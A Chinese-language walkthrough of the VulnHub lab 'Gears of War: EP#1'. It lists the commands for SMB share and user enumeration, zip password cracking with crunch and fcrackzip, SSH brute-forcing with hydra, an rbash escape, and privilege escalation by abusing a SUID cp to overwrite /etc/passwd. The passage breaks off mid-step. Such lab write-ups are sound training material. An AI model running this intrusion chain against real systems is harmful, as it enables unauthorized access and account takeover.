目录
介绍
系列:Gears of War(此系列仅此一台)
发布日期: 2019年10月17日
难度: 初级
Flag : 不详
学习:SMB攻击
靶机地址:https://www.vulnhub.com/entry/gears-of-war-ep1,382/
涉及到的相关工具,参见之前的文章:HACKNOS: OS-BYTESEC
信息收集
主机发现
netdiscover主机发现
对于VulnHub靶机来说,出现“PCS Systemtechnik GmbH”就是靶机。
主机信息探测
信息探测:nmap -A -p- 192.168.124.10,开放了22、80、139、445端口,445的信息过多,靶机的重点是在445上。
访问网站
会注意到网站上面有一个按钮,点击之后依然是一个静态页面,没啥玩的。
测试 samba 安全
smbmap 访问默认共享
smbmap -H 192.168.124.10,发现LOCUS_LAN$有读取权限
递归读取LOCUS_LAN$文件夹:smbmap -H 192.168.124.10 -R LOCUS_LAN$
enum4linux 获取系统用户
使用命令:enum4linux 192.168.124.10 -R | grep Local
枚举出三个用户:marcus、root、nobody
smbclient获取文件
使用空密码连接靶机的共享文件夹,使用get命令下载文件
查看文件
压缩包需要密码才能打开,txt给了一些提示,猜测是@%%,的某一种排列组合才能打开数据包
- 生成字典:
crunch 4 4 -t @%%, > list.txt - 爆破压缩包
- 安装工具:
sudo apt-get install fcrackzip - 爆破:
fcrackzip -D -u -p list.txt msg_horda.zip
- 安装工具:
翻译一下,给了我们一些字符:3_d4y。大概率就是这个靶机上的某用户的名字或者密码,由于压缩包解压之后得到的是key.txt,猜测这个应该是密码。
SSH爆破
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.124.10
登录SSH
使用命令:ssh marcus@192.168.124.10
发现自己的家目录里面有个文件夹,但是访问它的时候被拒了,提示rbash是受限制的。
绕过rbash
指定终端:ssh marcus@192.168.124.10 -t "bash -noprofile"
进来之后,发现啥也没有
提权
家目录下没啥文件,直接提权吧。
- 查找SUID文件:
find / -type f -perm -u=s 2>/dev/null
发现了cp,剩下的简单了,替换passwd文件实现提权即可
- 提取出靶机的passwd文件:
cat /etc/passwd > passwd - kali通过OpenSSL passwd生成一个新的用户hacker,密码为hack123:
┌──(root